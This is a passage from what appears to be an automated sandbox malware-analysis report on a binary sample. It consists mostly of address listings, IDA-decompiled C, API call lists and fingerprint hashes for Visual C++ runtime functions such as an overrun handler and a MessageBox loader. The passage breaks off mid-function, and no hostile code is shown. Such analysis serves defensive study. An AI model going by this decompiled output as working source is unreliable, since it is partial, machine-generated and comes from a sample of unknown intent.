                                                                              0x004110df
                                                                              0x004110eb
                                                                              0x004110ee
                                                                              0x004110fe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411110
                                                                              0x00411110
                                                                              0x00411112
                                                                              0x004111bd
                                                                              0x004111c4
                                                                              0x004111ca
                                                                              0x004111cc
                                                                              0x004111cf
                                                                              0x004111cf
                                                                              0x004111d1
                                                                              0x004111d8
                                                                              0x00411265
                                                                              0x0041126a
                                                                              0x0041126e
                                                                              0x00411271
                                                                              0x004113ad
                                                                              0x004113b0
                                                                              0x00411298
                                                                              0x004112a7
                                                                              0x004112a9
                                                                              0x004112ab
                                                                              0x004112b6
                                                                              0x004112bb
                                                                              0x004112be
                                                                              0x004112c9
                                                                              0x004112ce
                                                                              0x004112be
                                                                              0x004112cf
                                                                              0x004112d8
                                                                              0x004112da
                                                                              0x004112dc
                                                                              0x004112f0
                                                                              0x004112f6
                                                                              0x004112fa
                                                                              0x004112fc
                                                                              0x004112fe
                                                                              0x0041130f
                                                                              0x0041130f
                                                                              0x004112fe
                                                                              0x00411314
                                                                              0x00000000
                                                                              0x00411314
                                                                              0x004113b6
                                                                              0x004113b9
                                                                              0x00411466
                                                                              0x0041146d
                                                                              0x00411471
                                                                              0x00411476
                                                                              0x00411478
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041147e
                                                                              0x00411482
                                                                              0x00411485
                                                                              0x00411487
                                                                              0x00411490
                                                                              0x00411489
                                                                              0x00411489
                                                                              0x00411489
                                                                              0x00411495
                                                                              0x00411497
                                                                              0x00411499
                                                                              0x00000000
                                                                              0x0041149f
                                                                              0x0041149f
                                                                              0x004114a3
                                                                              0x004114a9
                                                                              0x004114a9
                                                                              0x004114ae
                                                                              0x004114b2
                                                                              0x004114c8
                                                                              0x004114ca
                                                                              0x004114cc
                                                                              0x004114df
                                                                              0x004114ce
                                                                              0x004114cf
                                                                              0x004114cf
                                                                              0x004114e4
                                                                              0x004114e6
                                                                              0x004114e8
                                                                              0x00000000
                                                                              0x004114ee
                                                                              0x004114f7
                                                                              0x004114fa
                                                                              0x004114ff
                                                                              0x00411502
                                                                              0x0041150f
                                                                              0x0041150f
                                                                              0x00000000
                                                                              0x00411502
                                                                              0x004114b4
                                                                              0x004114ba
                                                                              0x004114c0
                                                                              0x004114c2
                                                                              0x00000000
                                                                              0x004114c2
                                                                              0x004114b2
                                                                              0x00411499
                                                                              0x004113bf
                                                                              0x004113c2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004113c8
                                                                              0x004113cb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004113d1
                                                                              0x004113d1
                                                                              0x004113d3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004113dc
                                                                              0x004113e1
                                                                              0x004113e4
                                                                              0x004113f5
                                                                              0x004113e6
                                                                              0x004113e6
                                                                              0x004113eb
                                                                              0x004113eb
                                                                              0x004113fa
                                                                              0x004113fc
                                                                              0x004113fe
                                                                              0x00411401
                                                                              0x0041141c
                                                                              0x0041141e
                                                                              0x00411423
                                                                              0x00411425
                                                                              0x00411433
                                                                              0x00411436
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041143c
                                                                              0x0041143d
                                                                              0x0041143e
                                                                              0x0041143f
                                                                              0x00411441
                                                                              0x00411446
                                                                              0x00411447
                                                                              0x0041144a
                                                                              0x00411452
                                                                              0x00000000
                                                                              0x00411452
                                                                              0x00411428
                                                                              0x00000000
                                                                              0x00411403
                                                                              0x00411407
                                                                              0x00411412
                                                                              0x00411414
                                                                              0x00411416
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411416
                                                                              0x00411401
                                                                              0x00411277
                                                                              0x00411405
                                                                              0x00411405
                                                                              0x00411405
                                                                              0x00000000
                                                                              0x00411405
                                                                              0x0041127d
                                                                              0x00411280
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411286
                                                                              0x00411289
                                                                              0x00411327
                                                                              0x00411329
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411331
                                                                              0x00411337
                                                                              0x0041133c
                                                                              0x0041133f
                                                                              0x00411347
                                                                              0x0041134c
                                                                              0x0041134e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411354
                                                                              0x00411358
                                                                              0x0041136d
                                                                              0x0041136f
                                                                              0x00411371
                                                                              0x00411381
                                                                              0x00411373
                                                                              0x00411374
                                                                              0x00411374
                                                                              0x00411386
                                                                              0x00411388
                                                                              0x0041138a
                                                                              0x00411393
                                                                              0x00411398
                                                                              0x004113a1
                                                                              0x004113a7
                                                                              0x0041135a
                                                                              0x00411362
                                                                              0x00411362
                                                                              0x00000000
                                                                              0x00411358
                                                                              0x0041128f
                                                                              0x00411292
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411292
                                                                              0x004111df
                                                                              0x004111df
                                                                              0x004111e0
                                                                              0x0041120c
                                                                              0x00411210
                                                                              0x00411215
                                                                              0x0041121c
                                                                              0x00411222
                                                                              0x00411222
                                                                              0x00411226
                                                                              0x0041122a
                                                                              0x00411230
                                                                              0x00411230
                                                                              0x00411234
                                                                              0x00411244
                                                                              0x00411249
                                                                              0x0041124b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041124d
                                                                              0x00411250
                                                                              0x00411252
                                                                              0x00000000
                                                                              0x00411254
                                                                              0x00411257
                                                                              0x00000000
                                                                              0x00411257
                                                                              0x00411252
                                                                              0x00000000
                                                                              0x00411234
                                                                              0x0041122c
                                                                              0x0041122e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041122e
                                                                              0x0041121e
                                                                              0x00411220
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411220
                                                                              0x004111e2
                                                                              0x004111e5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004111eb
                                                                              0x004111ee
                                                                              0x00411201
                                                                              0x00411201
                                                                              0x00411206
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411206
                                                                              0x004111f2
                                                                              0x004111f8
                                                                              0x004111fb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411118
                                                                              0x00411118
                                                                              0x00411121
                                                                              0x00411142
                                                                              0x00411146
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411146
                                                                              0x0041114a
                                                                              0x0041116f
                                                                              0x0041116f
                                                                              0x00411176
                                                                              0x00411186
                                                                              0x00411186
                                                                              0x00411188
                                                                              0x004111ba
                                                                              0x004111ba
                                                                              0x00000000
                                                                              0x004111ba
                                                                              0x0041118a
                                                                              0x0041118d
                                                                              0x0041118f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411194
                                                                              0x00411198
                                                                              0x0041119c
                                                                              0x004111ab
                                                                              0x004111ab
                                                                              0x004111af
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004111b1
                                                                              0x004111b8
                                                                              0x00411236
                                                                              0x00411236
                                                                              0x00411316
                                                                              0x0041131b
                                                                              0x00411324
                                                                              0x00411324
                                                                              0x00000000
                                                                              0x004111b8
                                                                              0x0041119e
                                                                              0x004111a5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004111a5
                                                                              0x00411178
                                                                              0x0041117b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041117d
                                                                              0x00411184
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411184
                                                                              0x0041114c
                                                                              0x00411151
                                                                              0x00000000
                                                                              0x00411159
                                                                              0x00411159
                                                                              0x00411162
                                                                              0x00411167
                                                                              0x00000000
                                                                              0x00411169
                                                                              0x00411169
                                                                              0x00000000
                                                                              0x00411169
                                                                              0x00411167
                                                                              0x00411151
                                                                              0x00411112

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
                                                                              • String ID:
                                                                              • API String ID: 2999224188-0
                                                                              • Opcode ID: 81c8557fcc62b657759318c9e8e1294be6d82bdbd298a3b48f508cb4dec36334
                                                                              • Instruction ID: a10af213f865ed3091a5aaea9adb8c43c50ec6b0559451cfc79d8e8de6ad41fe
                                                                              • Opcode Fuzzy Hash: 81c8557fcc62b657759318c9e8e1294be6d82bdbd298a3b48f508cb4dec36334
                                                                              • Instruction Fuzzy Hash: 09C1DE3090022AABDF20AB65D944BFFBBB5AF44754F14412BEA01A7271CB7C9CC1CA5D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418586, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 97COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 59%
                                                                              			E00418586(void* __ebx, signed char** __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t22;
				intOrPtr* _t23;
				void* _t31;
				void* _t58;
				signed char* _t60;
				signed char** _t66;
				char* _t68;
				void* _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t73;

				_t67 = __edi;
				_t66 = __edx;
				_t54 = __ebx;
				_push(0x118);
				_push(0x44c628);
				E00412BA4(__ebx, __edi, __esi);
				_t22 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t72 - 0x1c)) = _t22;
				_t23 =  *0x45a724; // 0x0
				if(_t23 == 0) {
					if( *((intOrPtr*)(_t72 + 8)) == 1) {
						_t68 = "Buffer overrun detected!";
						 *(_t72 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t70 = 0xb9;
					} else {
						_t68 = "Unknown security failure detected!";
						 *(_t72 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t70 = 0xd4;
					}
					 *((char*)(_t72 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t72 - 0x124, 0x104) == 0) {
						E00419460(_t72 - 0x124, "<program name unknown>");
					}
					_t54 = _t72 - 0x124;
					if(E00411A30(_t72 - 0x124) + 0xb > 0x3c) {
						E0041ADB0(E00411A30(_t54) + _t72 - 0xf3, "...", 3);
						_t73 = _t73 + 0x10;
					}
					_t31 = E00411A30(_t54);
					_pop(_t58);
					E00412260(_t31 + _t70 + 0x0000000c + 0x00000003 & 0xfffffffc, _t58);
					 *((intOrPtr*)(_t72 - 0x18)) = _t73;
					_t71 = _t73;
					E00419460(_t71, _t68);
					_t67 = "\n\n";
					E00419470(_t71, "\n\n");
					E00419470(_t71, "Program: ");
					E00419470(_t71, _t54);
					E00419470(_t71, "\n\n");
					E00419470(_t71,  *(_t72 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t71);
					E0041C6F5();
				} else {
					 *(_t72 - 4) = 0;
					 *_t23( *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
					 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				}
				E00413195(3);
				asm("int3");
				_t19 =  &(_t66[1]);
				 *_t19 = _t66[1] - 1;
				if( *_t19 < 0) {
					return E0041CE26(_t54, _t67, _t72, _t66);
				} else {
					_t60 =  *_t66;
					 *_t66 =  &(_t60[1]);
					return  *_t60 & 0x000000ff;
				}
			}














                                                                              0x00418586
                                                                              0x00418586
                                                                              0x00418586
                                                                              0x00418586
                                                                              0x0041858b
                                                                              0x00418590
                                                                              0x00418595
                                                                              0x0041859a
                                                                              0x0041859d
                                                                              0x004185a6
                                                                              0x004185cb
                                                                              0x004185e3
                                                                              0x004185e8
                                                                              0x004185f2
                                                                              0x004185cd
                                                                              0x004185cd
                                                                              0x004185d2
                                                                              0x004185dc
                                                                              0x004185dc
                                                                              0x004185f7
                                                                              0x0041860f
                                                                              0x0041861d
                                                                              0x00418623
                                                                              0x00418624
                                                                              0x00418639
                                                                              0x00418658
                                                                              0x0041865d
                                                                              0x0041865d
                                                                              0x00418661
                                                                              0x00418666
                                                                              0x00418671
                                                                              0x00418676
                                                                              0x00418679
                                                                              0x0041867d
                                                                              0x00418682
                                                                              0x00418689
                                                                              0x00418694
                                                                              0x0041869b
                                                                              0x004186a2
                                                                              0x004186ae
                                                                              0x004186b3
                                                                              0x004186b8
                                                                              0x004186bd
                                                                              0x004186be
                                                                              0x004185a8
                                                                              0x004185a8
                                                                              0x004185b1
                                                                              0x004185b5
                                                                              0x004185b5
                                                                              0x004186c8
                                                                              0x004186cd
                                                                              0x004186ce
                                                                              0x004186ce
                                                                              0x004186d1
                                                                              0x004186e3
                                                                              0x004186d3
                                                                              0x004186d3
                                                                              0x004186d9
                                                                              0x004186db
                                                                              0x004186db

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0044C628,00000118,00412FA3,00000001,00000000,0044BC78,00000008,004172FD,00000000,00000000,00000000), ref: 00418607
                                                                              • _strcat.LIBCMT ref: 0041861D
                                                                              • _strlen.LIBCMT ref: 0041862D
                                                                              • _strlen.LIBCMT ref: 0041863E
                                                                              • _strncpy.LIBCMT ref: 00418658
                                                                              • _strlen.LIBCMT ref: 00418661
                                                                              • _strcat.LIBCMT ref: 0041867D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                              • API String ID: 3058806289-1673886896
                                                                              • Opcode ID: f28d508e9363690382514489229ac515cc01931938026898d4428815b295fd00
                                                                              • Instruction ID: 4b3dee8e0c2eeeff519a025442f79e7c162428ee7880824445fbee59176d29a9
                                                                              • Opcode Fuzzy Hash: f28d508e9363690382514489229ac515cc01931938026898d4428815b295fd00
                                                                              • Instruction Fuzzy Hash: E931F472A462187BDB10AB718D82FDE37A89F04318F14405FF404A6282DB7CDED18B9D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041640C, Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71libraryloadermemoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E0041640C() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E004147A5() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x45a5b0 = GetProcAddress(_t26, "FlsAlloc");
						 *0x45a5b4 = GetProcAddress(_t26, "FlsGetValue");
						 *0x45a5b8 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x45a5b4;
						 *0x45a5bc = _t16;
						if( *0x45a5b4 == 0) {
							 *0x45a5b4 = TlsGetValue;
							 *0x45a5b8 = TlsSetValue;
							 *0x45a5b0 = E0041622E;
							 *0x45a5bc = TlsFree;
						}
					}
					_t7 =  *0x45a5b0(E004162C5);
					__eflags = _t7 - 0xffffffff;
					 *0x457710 = _t7;
					if(__eflags == 0) {
						L9:
						E00416237();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E004146EA(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x45a5b8( *0x457710, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x4577b8;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E00416237();
					return 0;
				}
			}














                                                                              0x00416413
                                                                              0x0041641d
                                                                              0x0041642a
                                                                              0x0041642c
                                                                              0x0041642e
                                                                              0x00416430
                                                                              0x00416444
                                                                              0x00416451
                                                                              0x0041645e
                                                                              0x00416463
                                                                              0x00416465
                                                                              0x0041646c
                                                                              0x00416471
                                                                              0x00416478
                                                                              0x00416482
                                                                              0x0041648c
                                                                              0x00416496
                                                                              0x00416496
                                                                              0x00416471
                                                                              0x004164a0
                                                                              0x004164a6
                                                                              0x004164a9
                                                                              0x004164ae
                                                                              0x004164f1
                                                                              0x004164f1
                                                                              0x004164f6
                                                                              0x004164f6
                                                                              0x004164b0
                                                                              0x004164b2
                                                                              0x004164b8
                                                                              0x004164be
                                                                              0x004164c0
                                                                              0x004164c4
                                                                              0x00000000
                                                                              0x004164c6
                                                                              0x004164cd
                                                                              0x004164d3
                                                                              0x004164d5
                                                                              0x00000000
                                                                              0x004164d7
                                                                              0x004164d7
                                                                              0x004164de
                                                                              0x004164e1
                                                                              0x004164e7
                                                                              0x004164eb
                                                                              0x004164ed
                                                                              0x004164ed
                                                                              0x004164d5
                                                                              0x004164c4
                                                                              0x004164fa
                                                                              0x00416415
                                                                              0x00416415
                                                                              0x0041641c
                                                                              0x0041641c

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,74B04DE0,00000000,00412E3E,?,0044BC68,00000060), ref: 00416424
                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041643C
                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00416449
                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00416456
                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00416463
                                                                              • FlsAlloc.KERNEL32(004162C5,?,0044BC68,00000060), ref: 004164A0
                                                                              • FlsSetValue.KERNEL32(00000000,?,0044BC68,00000060), ref: 004164CD
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004164E1
                                                                                • Part of subcall function 00416237: FlsFree.KERNEL32(00000006,004164F6,?,0044BC68,00000060), ref: 00416242
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                              • API String ID: 2355849793-282957996
                                                                              • Opcode ID: 9e510d61cc21bddcd4574fa6883e21f2e445ab6703d7604ce7355308ef32ae10
                                                                              • Instruction ID: 67e5d30d09829f2954eda8bc3cfda7784ab9eb3bde95fd9faf2e06f326351d81
                                                                              • Opcode Fuzzy Hash: 9e510d61cc21bddcd4574fa6883e21f2e445ab6703d7604ce7355308ef32ae10
                                                                              • Instruction Fuzzy Hash: 60217C70504718AA9B20AF29BD49A573FF0EB85753311067FF416C22A1EBB8D488CF5E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041C6F5, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 29%
                                                                              			E0041C6F5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x45a888 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x45a894; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x45a88c; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x45a890; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x45a888(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x45a3fc < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x45a898() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x45a888 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x45a88c = GetProcAddress(_t31, "GetActiveWindow");
					 *0x45a890 = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x45a3f0 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x45a898 = _t26;
						if(_t26 != 0) {
							 *0x45a894 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}















                                                                              0x0041c6fc
                                                                              0x0041c6fe
                                                                              0x0041c706
                                                                              0x0041c775
                                                                              0x0041c775
                                                                              0x0041c77c
                                                                              0x0041c7ba
                                                                              0x0041c7ba
                                                                              0x0041c7c1
                                                                              0x0041c7c5
                                                                              0x0041c7c9
                                                                              0x0041c7cb
                                                                              0x0041c7d2
                                                                              0x0041c7d7
                                                                              0x0041c7d7
                                                                              0x0041c7d2
                                                                              0x0041c7c9
                                                                              0x0041c7d9
                                                                              0x00000000
                                                                              0x0041c7e3
                                                                              0x0041c77e
                                                                              0x0041c782
                                                                              0x0041c7a1
                                                                              0x0041c7a8
                                                                              0x0041c7b4
                                                                              0x0041c7aa
                                                                              0x0041c7aa
                                                                              0x0041c7aa
                                                                              0x00000000
                                                                              0x0041c7a8
                                                                              0x0041c787
                                                                              0x0041c788
                                                                              0x0041c78d
                                                                              0x0041c78e
                                                                              0x0041c790
                                                                              0x0041c799
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c799
                                                                              0x0041c713
                                                                              0x0041c717
                                                                              0x0041c7b0
                                                                              0x00000000
                                                                              0x0041c7b0
                                                                              0x0041c729
                                                                              0x0041c72d
                                                                              0x0041c732
                                                                              0x00000000
                                                                              0x0041c734
                                                                              0x0041c742
                                                                              0x0041c750
                                                                              0x0041c755
                                                                              0x0041c75d
                                                                              0x0041c761
                                                                              0x0041c766
                                                                              0x0041c770
                                                                              0x0041c770
                                                                              0x0041c766
                                                                              0x00000000
                                                                              0x0041c755

                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(user32.dll,0044C3B0,?,?), ref: 0041C70D
                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041C729
                                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041C73A
                                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0041C747
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0041C75D
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0041C76E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                              • API String ID: 2238633743-1612076079
                                                                              • Opcode ID: 4be51c41bfa88825c9eef02e0fc808f0e31b0e6baba86614993bf8dfa1398cb3
                                                                              • Instruction ID: ccfaab82150faac271222fce0a4fbcbc68ab76b021f251c2d7e6e2ab04d4bf56
                                                                              • Opcode Fuzzy Hash: 4be51c41bfa88825c9eef02e0fc808f0e31b0e6baba86614993bf8dfa1398cb3
                                                                              • Instruction Fuzzy Hash: E421B430680347AAEB01AFB59CC5BBB3BE9DB04781B14053BA515C2291EBF8D4919E5E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042FCB6, Relevance: 19.9, APIs: 13, Instructions: 395stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 48%
                                                                              			E0042FCB6(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E004128A0(E004314A3, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x4560dc(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E00412140(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E00424440(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E00412140(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
